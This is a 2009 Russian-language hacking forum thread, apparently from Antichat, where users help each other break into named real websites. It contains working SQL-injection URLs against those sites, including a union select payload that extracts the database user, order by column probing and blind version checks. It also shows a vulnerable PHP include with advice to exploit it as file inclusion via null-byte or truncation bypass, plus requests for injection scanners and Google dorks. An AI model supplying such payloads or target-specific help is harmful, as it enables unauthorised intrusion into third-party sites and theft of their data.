 |
|
16.06.2009, 08:10
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
а понял значит я перепутал, спасибо
|
|
|
16.06.2009, 10:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
http://www.mieszkania.inter-bud.pl/m-os.php?id=115
PostgreSQL. Статью читал, но ни ордер баем ни юнион селектом не подобрал. Прошу помощи 
Код:
http://www.gambitlive.com/night.php?id=90
MySQL 5 (по блинду узнал), но юниона не читает. Можно сделать вывод там?
Последний раз редактировалось mailbrush; 16.06.2009 в 10:30..
|
|
|
|
16.06.2009, 11:15
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Подскажие пожалуйста сканеры ТОЛЬКО SQL-inj , которые сканировали бы, например, сайт на параметарезированные ссылки. (Что-то типа запроса к гуглу: site: moy_Sayt.ru inurl:"ID=")
SIPT,NetDeviLz SQL Scanner не катят))
|
|
|
|
16.06.2009, 11:17
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами:
8941129
Репутация:
7
|
|
Сообщение от mailbrush
http://forum.antichat.ru/thread49775.html
Архивчик битый в этой теме, перезалейте плиз.
|
|
|
|
16.06.2009, 11:31
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Сообщение от mailbrush
Код:
http://www.mieszkania.inter-bud.pl/m-os.php?id=115
PostgreSQL. Статью читал, но ни ордер баем ни юнион селектом не подобрал. Прошу помощи
Код:
http://www.gambitlive.com/night.php?id=90
MySQL 5 (по блинду узнал), но юниона не читает. Можно сделать вывод там?
можно, вот:
http://www.gambitlive.com/index.php?page=gallery&&albumid=409+union+select+1 ,user(),3,4,5,6,7,8+limit+1,1--
|
|
|
|
16.06.2009, 14:39
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
никак не могу подобрать столбцы, хотя на лицо, что это обычная MySQL inj
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619
подскажите плиз))
|
|
|
|
16.06.2009, 14:47
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+order+b y+4/*
4-ый мускул
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+and+sub string(version(),1,1)=4
p.s. раскручивайте её как слепую, имхо.
Последний раз редактировалось AlexSatter; 16.06.2009 в 15:04..
|
|
|
|
16.06.2009, 14:52
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
PHP код:
if (!IsSet($t)&!IsSet($f))
{
$f="main";
$filename=$f . ".php";
}
else
{
if (IsSet($t)&!IsSet($f))
{
$filename=$t . "/index.php";
}
if (IsSet($t)&IsSet($f))
{
$filename= $t . "/" . $f . ".php";
}
if (!IsSet($t)&IsSet($f))
{
$filename=$f . ".php";
}
}
if (file_exists("$filename"))
{ include("$filename"); }
else
{ echo " <div class=\"alert\"> 404, . </div>"; }
Можно ли в такое инъекцию провести и как? |
|
|
|
16.06.2009, 14:57
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
насколько позволяет моя квалификация... в этом коде возможна php-inj
защиты тут в общем-то никакой нет.
расширение отбрасывайте с помощью null-byte либо с помощью усечения...
Последний раз редактировалось AlexSatter; 16.06.2009 в 15:12..
|
|
|
|
16.06.2009, 15:06
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
2 Byrger
ты же уже задавал этот вопрос, не доходчиво объяснили?
https://forum.antichat.net/printthread.php?t=46016&page=185&pp=40
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
|
|
|
|
Похожие темы
Линейный вид
